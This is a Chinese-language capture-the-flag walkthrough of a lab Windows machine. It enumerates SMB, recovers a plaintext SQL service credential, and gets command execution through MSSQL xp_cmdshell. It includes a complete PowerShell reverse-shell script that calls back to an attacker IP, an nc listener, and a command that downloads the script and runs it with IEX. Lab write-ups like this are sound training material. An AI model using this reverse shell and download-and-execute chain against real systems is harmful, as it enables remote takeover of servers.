常规nmap扫描目标IP,得到有哪些端口号开放以及哪些服务,可以看到SMB协议的1433端口号开放,伴随着还有MySQL的服务。
利用SMB中的smbclient工具远程连接并枚举:
smbclient -N -L \\\\{TARGET_IP}\\ #-N:no password ,-L:查找的服务在服务器端是是可适用的。
针对出现的一组share,经过试验,ADMIN$和C$并不能被访问,因为只能访问backups目录, 根据下述命令枚举backups:
smbclient -N \\\\{TARGET_IP}\\backups?下图展示了SMB远程连接目标IP,查看目录,下载配置文件,并退出,一整个流程。
?查看配置文件中的内容(关键内容:密码和用户信息):
?密码:M3g4c0rp123,用户:ARCHETYPE\sql_svc
根据提供的信息,需要采用一个工具连接MSSQL服务器,在这里采用impacket工具。
Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的低级编程访问,对于某些协议(如SMB1-3和MSRPC),提供协议实现本身。数据包可以从零开始构造,也可以从原始数据解析,而面向对象的API使使用深层协议层次结构变得简单。该库提供了一组工具,作为在该库的上下文中可以执行的操作的示例。
关于他如何安装,在这里就不在多余解释。直接采用命令行连接MSSQL:
target_IP前面的是用户,之后会输入前面配置文件中的密码。
python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
?首先,需要确认我们连接的对象是否在服务中:
SELECT is_srvrolemember('sysadmin');?设置相关命令,需要令在该连接模式下可以执行cmd命令。
?设置成功:
?到这里,我们已经初步拿到shell了。
持久化shell
SQL Server的shel还略显单薄,既然是Windows,那么就尝试用Powershell脚本、nc监听做一个持久化的连接。
第一行的IP填写最开始获取的Kali IP,注意网段
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.226",443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "# ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};
$client.Close()将它保存到kali的桌面,名称为shell.ps1
之后用python起一个服务器,以便靶机访问脚本、下载脚本,服务器在桌面起,和shell.ps1在同一个文件夹
python3 -m http.server 80要确保起了后能访问到脚本
nc起一个监听用于shell交互,端口同上所设置的443
nc -lvnp 443?返回mssqlclient,让靶机访问、下载、运行脚本,同理xxx是Kali IP
mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
SQL \> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.xxx/shell.ps1\");"如果成功连接在其他两个窗口就可以顺利看到监听到主机,
?
?
?
